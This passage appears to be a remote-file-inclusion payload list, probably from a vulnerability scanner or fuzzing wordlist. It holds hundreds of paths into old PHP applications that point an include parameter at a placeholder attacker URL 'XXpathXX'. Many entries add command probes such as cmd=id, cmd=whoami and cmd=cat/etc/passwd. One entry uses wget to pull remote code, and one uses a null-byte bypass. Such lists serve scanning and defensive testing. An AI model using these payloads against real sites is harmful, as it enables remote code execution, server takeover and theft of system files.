-/biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX
-/biblioteca/bib_plform.php?CLASSPATH=XXpathXX
-/biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX
-/biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX
-/biblioteca/bib_save.php?CLASSPATH=XXpathXX
-/biblioteca/bib_searchc.php?CLASSPATH=XXpathXX
-/biblioteca/bib_searchs.php?CLASSPATH=XXpathXX
-/biblioteca/edi_form.php?CLASSPATH=XXpathXX
-/biblioteca/edi_save.php?CLASSPATH=XXpathXX
-/biblioteca/gen_form.php?CLASSPATH=XXpathXX
-/biblioteca/gen_save.php?CLASSPATH=XXpathXX
-/biblioteca/lin_form.php?CLASSPATH=XXpathXX
-/biblioteca/lin_save.php?CLASSPATH=XXpathXX
-/biblioteca/luo_form.php?CLASSPATH=XXpathXX
-/biblioteca/luo_save.php?CLASSPATH=XXpathXX
-/biblioteca/sog_form.php?CLASSPATH=XXpathXX
-/biblioteca/sog_save.php?CLASSPATH=XXpathXX
-/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX
-/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
-/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
-/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
-/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX?
-/bild.php?config[root_ordner]=XXpathXX?&cmd=id
-/bin/qte_init.php?qte_root=XXpathXX?
-/bingoserver.php3?response_dir=XXpathXX
-/block.php?Include=XXpathXX
-/blocks/birthday.php?full_path=XXpathXX
-/blocks/events.php?full_path=XXpathXX
-/blocks/help.php?full_path=XXpathXX
-/blogcms/admin/media.php?DIR_LIBS=XXpathXX?
-/blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX?
-/blogcms/index.php?DIR_PLUGINS=XXpathXX?
-/board/post.php?qb_path=XXpathXX
-/boitenews4/index.php?url_index=XXpathXX?
-/books/allbooks.php?home=XXpathXX
-/books/home.php?home=XXpathXX
-/books/mybooks.php?home=XXpathXX
-/bp_ncom.php?bnrep=XXpathXX
-/bp_ncom.php?bnrep=XXpathXX?
-/bp_news.php?bnrep=XXpathXX
-/bridge/enigma/E2_header.inc.php?boarddir=XXpathXX?
-/bridge/yabbse.inc.php?sourcedir=XXpathXX
-/bridges/SMF/logout.php?path_to_smf=XXpathXX
-/bu/bu_cache.php?bu_dir=XXpathXX?
-/bu/bu_claro.php?bu_dir=XXpathXX?
-/bu/bu_parse.php?bu_dir=XXpathXX?
-/bu/process.php?bu_dir=XXpathXX?
-/buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX?
-/builddb.php?env_dir=XXpathXX
-/button/settings_sql.php?path=XXpathXX
-/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX?
-/cal.func.php?dir_edge_lang=XXpathXX
-/calcul-page.php?home=XXpathXX
-/calendar.php?cfg_dir=XXpathXX?
-/calendar.php?lang=XXpathXX
-/calendar.php?path_to_calendar=XXpathXX
-/calendar.php?vwar_root=XXpathXX?
-/calendar/demo/index.php?date=&v=XXpathXX?
-/calendar/payment.php?insPath=XXpathXX
-/calendario/cal_insert.php?CLASSPATH=XXpathXX
-/calendario/cal_save.php?CLASSPATH=XXpathXX
-/calendario/cal_saveactivity.php?CLASSPATH=XXpathXX
-/cart.php?lang_list=XXpathXX
-/cart_content.php?cart_isp_root=XXpathXX
-/catalogg/inludes/include_once.php?include_file=XXpathXX
-/catalogshop.php?mosConfig_absolute_path=XXpathXX
-/cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX?
-/cfagcms/themes/default/index.php?main=XXpathXX
-/ch_readalso.php?read_xml_include=XXpathXX
-/challenge.php?vwar_root=XXpathXX
-/change_preferences2.php?target=XXpathXX?
-/chat.php?CONFIG[MWCHAT_Libs]=XXpathXX?
-/chat.php?my[root]=XXpathXX?cm=id
-/chat/adminips.php?banned_file=XXpathXX
-/chat/users_popupL.php3?From=XXpathXX
-/checkout.php?abs_path=XXpathXX
-/checkout.php?abs_path=XXpathXX?
-/ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX'
-/circ.php?include_path=XXpathXX?
-/circolari/cir_save.php?CLASSPATH=XXpathXX
-/citywriter/head.php?path=XXpathXX?
-/cl_files/index.php?path_to_calendar=XXpathXX?
-/claroline/auth/ldap/authldap.php?includePath=XXpathXX
-/claroline/phpbb/page_tail.php?includePath=XXpathXX
-/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX?
-/class.mysql.php?path_to_bt_dir=XXpathXX
-/class/Wiki/Wiki.php?c_node[class_path]=XXpathXX
-/class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname
-/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX
-/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX
-/classes/Cache.class.php?rootdir=XXpathXX?
-/classes/Customer.class.php?rootdir=XXpathXX?
-/classes/Performance.class.php?rootdir=XXpathXX?
-/classes/Project.class.php?rootdir=XXpathXX?
-/classes/Representative.class.php?rootdir=XXpathXX?
-/classes/User.class.php?rootdir=XXpathXX?
-/classes/admin_o.php?absolutepath=XXpathXX
-/classes/adodbt/sql.php?classes_dir=XXpathXX
-/classes/adodbt/sql.php?classes_dir=XXpathXX?
-/classes/board_o.php?absolutepath=XXpathXX
-/classes/class_admin.php?PathToComment=XXpathXX?
-/classes/class_comments.php?PathToComment=XXpathXX?
-/classes/class_mail.inc.php?path_to_folder=XXpathXX
-/classes/common.php?rootdir=XXpathXX?
-/classes/core/language.php?rootdir=XXpathXX
-/classes/dev_o.php?absolutepath=XXpathXX
-/classes/file_o.php?absolutepath=XXpathXX
-/classes/html/com_articles.php?absolute_path=XXpathXX
-/classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
-/classes/query.class.php?baseDir=XXpathXX
-/classes/tech_o.php?absolutepath=XXpathXX
-/classified.php?insPath=XXpathXX
-/classified_right.php?language_dir=XXpathXX
-/classifieds/index.php?lowerTemplate=XXpathXX
-/clear.php?bibtexrootrel=XXpathXX?
-/clearinfo.php?bibtexrootrel=XXpathXX?
-/click.php?dir=XXpathXX?
-/client.php?dir=XXpathXX
-/client/faq_1/PageController.php?dir=XXpathXX
-/clients/index.php?src=XXpathXX
-/cls_fast_template.php?fname=XXpathXX
-/cm68news/engine/oldnews.inc.php?addpath=XXpathXX?&
-/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX?
-/cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX
-/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX
-/cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX
-/cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX
-/cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX
-/cms/meetweb/classes/modules.php?root_path=XXpathXX
-/cms/modules/form.lib.php?sourceFolder=XXpathXX?
-/cms/system/openengine.php?oe_classpath=XXpathXX???
-/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX?
-/cn_config.php?tpath=XXpathXX?
-/coast/header.php?sections_file=XXpathXX?
-/code/berylium-classes.php?beryliumroot=XXpathXX?
-/code/display.php?admindir=XXpathXX?
-/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX
-/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
-/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX?
-/com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
-/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
-/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
-/comments.php?AMG_serverpath=XXpathXX
-/comments.php?scriptpath=XXpathXX?
-/common.inc.php?CFG[libdir]=XXpathXX
-/common.inc.php?CFG[libdir]=XXpathXX?
-/common.inc.php?base_path=XXpathXX
-/common.php?db_file=XXpathXX
-/common.php?dir=XXpathXX
-/common.php?ezt_root_path=XXpathXX?
-/common.php?include_path=XXpathXX
-/common.php?livealbum_dir=XXpathXX?
-/common.php?locale=XXpathXX
-/common.php?phpht_real_path=XXpathXX?
-/common/db.php?commonpath=XXpathXX?
-/common/func.php?CommonAbsD=XXpathXX?
-/common/func.php?CommonAbsDir=XXpathXX
-/community/Offline.php?sourcedir=XXpathXX?
-/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX
-/components/calendar/com_calendar.php?absolute_path=XXpathXX?
-/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX
-/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX
-/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX
-/components/com_articles.php?absolute_path=XXpathXX?
-/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX
-/components/com_calendar.php?absolute_path=XXpathXX?
-/components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX?
-/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX
-/components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX
-/components/com_forum/download.php?phpbb_root_path=XXpathXX
-/components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX
-/components/com_guestbook.php?absolute_path=XXpathXX?
-/components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX?
-/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX
-/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX
-/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX
-/components/com_joomlaboard/file_upload.php?sbp=XXpathXX?
-/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX?
-/components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX?
-/components/com_mambowiki/MamboLogin.php?IP=XXpathXX?
-/components/com_minibb.php?absolute_path=XXpathXX
-/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX
-/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX
-/components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id
-/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX
-/components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX
-/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
-/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX?
-/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX
-/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
-/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX
-/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
-/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
-/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX?
-/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX
-/components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX
-/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX
-/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX
-/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX
-/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX
-/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX
-/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX
-/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX
-/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX
-/components/core/connect.php?language_path=XXpathXX
-/components/minibb/bb_plugins.php?absolute_path=XXpathXX?
-/components/minibb/index.php?absolute_path=XXpathXX?
-/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
-/compteur/mapage.php?chemin=XXpathXX
-/conf.php?securelib=XXpathXX
-/conf.php?securelib=XXpathXX?
-/config.inc.php3?rel_path=XXpathXX
-/config.inc.php?_path=XXpathXX
-/config.inc.php?path_escape=XXpathXX
-/config.inc.php?path_escape=XXpathXX%00
-/config.php?full_path=XXpathXX?
-/config.php?full_path_to_db=XXpathXX
-/config.php?fullpath=XXpathXX
-/config.php?incpath=XXpathXX
-/config.php?path_to_root=XXpathXX
-/config.php?rel_path=XXpathXX?
-/config.php?returnpath=XXpathXX
-/config.php?sql_language=XXpathXX?
-/config.php?xcart_dir=XXpathXX?
-/config/config_admin.php?INC=XXpathXX?
-/config/config_main.php?INC=XXpathXX?
-/config/config_member.php?INC=XXpathXX?
-/config/dbutil.bck.php?confdir=XXpathXX
-/config/mysql_config.php?INC=XXpathXX?
-/config/sender.php?ROOT_PATH=XXpathXX?
-/configuration.php?absolute_path=XXpathXX?
-/confirmUnsubscription.php?output=XXpathXX
-/connect.php?path=XXpathXX
-/connexion.php?DOCUMENT_ROOT=XXpathXX?
-/contact.php?blog_theme=XXpathXX
-/contacts.php?cal_dir=XXpathXX
-/contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX
-/content.php?content=XXpathXX
-/content/admin.php?pwfile=XXpathXX
-/content/content.php?fileloc=XXpathXX?
-/content/delete.php?pwfile=XXpathXX
-/content/modify.php?pwfile=XXpathXX
-/content/modify_go.php?pwfile=XXpathXX
-/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX
-/contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX
-/contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX?
-/controllers/MySQLController.php?baseDir=XXpathXX
-/controllers/SQLController.php?baseDir=XXpathXX
-/controllers/SetupController.php?baseDir=XXpathXX
-/controllers/VideoController.php?baseDir=XXpathXX
-/controllers/ViewController.php?baseDir=XXpathXX
-/convert-date.php?cal_dir=XXpathXX
-/convert/mvcw.php?step=1&vwar_root=XXpathXX
-/convert/mvcw.php?vwar_root=XXpathXX
-/core/admin/admin.php?p=admin&absoluteurlXXpathXX
-/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX
-/core/admin/categories_add.php?absoluteurlXXpathXX
-/core/admin/categories_remove.php?absoluteurlXXpathXX
-/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX
-/core/admin/editdel.php?p=admin&absoluteurlXXpathXX
-/core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX
-/core/admin/login.php?absoluteurlXXpathXX
-/core/admin/pgRSSnews.php?absoluteurlXXpathXX
-/core/admin/showcat.php?absoluteurlXXpathXX
-/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX
-/core/archive_cat.php?absoluteurlXXpathXX
-/core/archive_nocat.php?absoluteurlXXpathXX
-/core/aural.php?site_absolute_path=XXpathXX
-/core/aural.php?site_absolute_path=XXpathXX?&cmd=dir
-/core/editor.php?editor_insert_bottom=XXpathXX
-/core/includes.php?CMS_ROOT=XXpathXX?
-/core/recent_list.php?absoluteurlXXpathXX
-/corpo.php?pagina=XXpathXX
-/cp2.php?securelib=XXpathXX?
-/cpe/index.php?repertoire_config=XXpathXX
-/crea.php?plancia=XXpathXX
-/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX?
-/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX?
-/creat_news_all.php?language=XXpathXX
-/create_file.php?target=XXpathXX?
-/cron.php?ROOT_PATH=XXpathXX
-/cron.php?include_path=XXpathXX?
-/crontab/run_billing.php?config[include_dir]=XXpathXX?
-/cross.php?url=XXpathXX
-/custom_vars.php?sys[path_addon]=XXpathXX
-/customer/product.php?xcart_dir=XXpathXX
-/cwb/comanda.php?INCLUDE_PATH=XXpathXX?
-/datei.php?config[root_ordner]=XXpathXX?&cmd=id
-/db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX?
-/db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX?
-/dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX
-/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX
-/debugger.php?config_atkroot=XXpathXX
-/decoder/gallery.php?ccms_library_path=XXpathXX
-/decoder/markdown.php?ccms_library_path=XXpathXX
-/defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls
-/defines.php?WEBCHATPATH=XXpathXX?
-/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX&
-/depouilg.php3?NomVote=XXpathXX?
-/development.php?root_prefix=XXpathXX?
-/dfcode.php?DFORUM_PATH=XXpathXX?
-/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX?
-/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX?
-/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX
-/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX?
-/dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX?
-/dialogs/a.php?spaw_dir=XXpathXX?&cmd=id
-/dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id
-/dialogs/img.php?spaw_dir=XXpathXX?&cmd=id
-/dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id
-/dialogs/table.php?spaw_dir=XXpathXX?&cmd=id
-/dialogs/td.php?spaw_dir=XXpathXX?&cmd=id
-/digitaleye_Path/module.php?menu=XXpathXX?
-/dir/prepend.php?_PX_config[manager_path]=XXpathXX
-/dir_thatware/config.php?root_path=XXpathXX'
-/direct.php?rf=XXpathXX
-/direction/index.php?repertoire_config=XXpathXX
-/directory/index.php?path=XXpathXX
-/display.php?pag=XXpathXX
-/display.php?path=XXpathXX
-/displayCategory.php?basepath=XXpathXX
-/dix.php3?url_phpartenaire=XXpathXX
-/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
-/doc/admin/index.php?ptinclude=XXpathXX
-/doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX
-/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX
-/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX
-/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX
-/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX
-/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX
-/docs/front-end-demo/cart2.php?workdir=XXpathXX?
-/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX
-/dosearch.php?RESPATH=XXpathXX
-/download.php?root_prefix=XXpathXX?
-/download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX
-/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX
-/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX
-/downstat1.8/chart.php?art=XXpathXX?
-/dp_logs.php?HomeDir=XXpathXX
-/eXPerience2/modules.php?file=XXpathXX
-/ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
-/edit.php?javascript_path=XXpathXX?
-/editor.php?newsfile=XXpathXX
-/editprofile.php?pathtohomedir=XXpathXX?
-/editsite.php?returnpath=XXpathXX
-/editx/add_address.php?include_dir=XXpathXX
-/elseif/contenus.php?contenus=XXpathXX
-/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX
-/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX
-/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX
-/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX
-/elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX
-/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX
-/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX
-/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX
-/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX
-/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX
-/email_subscribe.php?root_prefix=XXpathXX?
-/embed/day.php?path=XXpathXX
-/enc/content.php?Home_Path=XXpathXX?
-/engine/Ajax/editnews.php?root_dir=XXpathXX
-/engine/api/api.class.php?dle_config_api=XXpathXX?
-/engine/engine.inc.php?absolute_path=XXpathXX
-/engine/init.php?root_dir=XXpathXX
-/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX?
-/enth3/show_joined.php?path=XXpathXX
-/environment.php?DIR_PREFIX=XXpathXX
-/epal/index.php?view=XXpathXX?
-/errors.php?error=XXpathXX
-/errors/configmode.php?GALLERY_BASEDIR=XXpathXX
-/errors/needinit.php?GALLERY_BASEDIR=XXpathXX
-/errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX
-/errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX
-/es_custom_menu.php?files_dir=XXpathXX
-/es_desp.php?files_dir=XXpathXX
-/es_offer.php?files_dir=XXpathXX
-/eshow.php?Config_rootdir=XXpathXX
-/esupport/admin/autoclose.php?subd=XXpathXX?
-/eva/index.php3?aide=XXpathXX?
-/eva/index.php3?perso=XXpathXX
-/eva/index.php?eva[caminho]=XXpathXX
-/event.php?myevent_path=XXpathXX
-/event_cal/module/embed/day.php?path=XXpathXX
-/eventcal2.php.php?path_simpnews=XXpathXX
-/eventscroller.php?path_simpnews=XXpathXX
-/example-view/templates/article.php?globals[content_dir]=XXpathXX?
-/example-view/templates/dates_list.php?globals[content_dir]=XXpathXX?
-/example-view/templates/root.php?globals[content_dir]=XXpathXX?
-/example.php?site=XXpathXX
-/example/gamedemo/inc.functions.php?projectPath=XXpathXX?
-/examplefile.php?bibtexrootrel=XXpathXX?
-/examples/patExampleGen/bbcodeSource.php?example=XXpathXX
-/exception/include.php?_APP_RELATIVE_PATH=XXpathXX
-/extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX
-/extras/mt.php?web_root=XXpathXX
-/extras/poll/poll.php?file_newsportal=XXpathXX
-/ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX
-/faq.php?module_root_path=XXpathXX
-/faq.php?phpbb_root_path=XXpathXX
-/fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX
-/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX
-/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id
-/fcring.php?s_fuss=XXpathXX
-/feed.php?config[root_ordner]=XXpathXX?&cmd=id
-/feed/index2.php?m=XXpathXX
-/files/amazon-bestsellers.php?CarpPath=XXpathXX
-/files/carprss.php?CarpPath=XXpathXX
-/files/compose-attach.php3?BSX_LIBDIR=XXpathXX
-/files/compose-menu.php3?BSX_LIBDIR=XXpathXX
-/files/compose-new.php3?BSX_LIBDIR=XXpathXX
-/files/compose-send.php3?BSX_LIBDIR=XXpathXX
-/files/folder-create.php3?BSX_LIBDIR=XXpathXX
-/files/folder-delete.php3?BSX_LIBDIR=XXpathXX
-/files/folder-empty.php3?BSX_LIBDIR=XXpathXX
-/files/folder-rename.php3?BSX_LIBDIR=XXpathXX
-/files/folders.php3?BSX_LIBDIR=XXpathXX
-/files/login.php3?err=hack&BSX_HTXDIR=XXpathXX
-/files/mainfile.php?page[path]=XXpathXX?&cmd=ls
-/files/mbox-list.php3?BSX_LIBDIR=XXpathXX
-/files/message-delete.php3?BSX_LIBDIR=XXpathXX
-/files/message-forward.php3?BSX_LIBDIR=XXpathXX
-/files/message-header.php3?BSX_LIBDIR=XXpathXX
-/files/message-print.php3?BSX_LIBDIR=XXpathXX
-/files/message-read.php3?BSX_LIBDIR=XXpathXX
-/files/message-reply.php3?BSX_LIBDIR=XXpathXX
-/files/message-replyall.php3?BSX_LIBDIR=XXpathXX
-/files/message-search.php3?BSX_LIBDIR=XXpathXX
-/findix/index.php?page=XXpathXX?&cmd=id
-/fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX
-/flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX?
-/fonctions/template.php?repphp=XXpathXX?
-/fonctions_racine.php?chemin_lib=XXpathXX
-/footer.inc.php?settings[footer]=XXpathXX
-/footer.inc.php?tfooter=XXpathXX?
-/footer.php?footer_file=XXpathXX
-/footer.php?op[footer_body]=XXpathXX?
-/form.php?path=XXpathXX?&cmd=pwd
-/forum.php?cfg_file=1&fpath=XXpathXX?
-/forum/forum.php?view=XXpathXX
-/forum/forum82lib.php3?repertorylevel=XXpathXX?
-/forum/gesfil.php?repertorylevel=XXpathXX?
-/forum/lostpassword.php?repertorylevel=XXpathXX?
-/forum/mail.php?repertorylevel=XXpathXX?
-/forum/member.php?repertorylevel=XXpathXX?
-/forum/message.php?repertorylevel=XXpathXX?
-/forum/search.php?repertorylevel=XXpathXX?
-/forum/track.php?path=XXpathXX
-/frame.php?framefile=XXpathXX
-/ftp.php?path_local=XXpathXX
-/function.inc.php?path=XXpathXX
-/function.php?adminfolder=XXpathXX
-/function.php?gbpfad=XXpathXX
-/functions.php?include_path=XXpathXX
-/functions.php?pmp_rel_path=XXpathXX
-/functions.php?s[phppath]=XXpathXX
-/functions.php?set_path=XXpathXX?
-/functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX?
-/functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX?
-/functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX?
-/functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX?
-/functions/prepend_adm.php?SETS[path][physical]=XXpathXX
-/functions/prepend_adm.php?SETS[path][physical]=XXpathXX?
-/functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX?
-/functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX?
-/functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls
-/fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX
-/galerie.php?config[root_ordner]=XXpathXX?cmd=id
-/gallery/captionator.php?GALLERY_BASEDIR=XXpathXX
-/gallery/lib/content.php?include=XXpathXX?cmd=ls
-/gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX
-/gallerypath/index.php?includepath=XXpathXX
-/games.php?id=XXpathXX
-/games.php?scoreid=XXpathXX
-/gbook/includes/header.php?abspath=XXpathXX?
-/gemini/page/forums/bottom.php?lang=XXpathXX?
-/gen_m3u.php?phpbb_root_path=XXpathXX
-/genepi.php?topdir=XXpathXX
-/generate.php?ht_pfad=XXpathXX?
-/gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd
-/gestArt/aide.php3?aide=XXpathXX?
-/get_session_vars.php?path_to_smf=XXpathXX
-/getpage.php?page=online&doc_path=XXpathXX
-/global.php?abs_path=XXpathXX?
-/gorum/dbproperty.php?appDirName=XXpathXX
-/gpb/include/db.mysql.inc.php?root_path=XXpathXX?
-/gpb/include/gpb.inc.php?root_path=XXpathXX?
-/graph.php?DOCUMENT_ROOT=XXpathXX?
-/gruppen.php?config[root_ordner]=XXpathXX?&cmd=id
-/handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX
-/handlers/page/show.php?sous_rep=XXpathXX
-/head.php?CONFIG[MWCHAT_Libs]=XXpathXX?
-/header.inc.php?CssFile=XXpathXX
-/header.php?path=XXpathXX
-/header.php?wwwRoot=XXpathXX
-/help.php?CONFIG[MWCHAT_Libs]=XXpathXX?
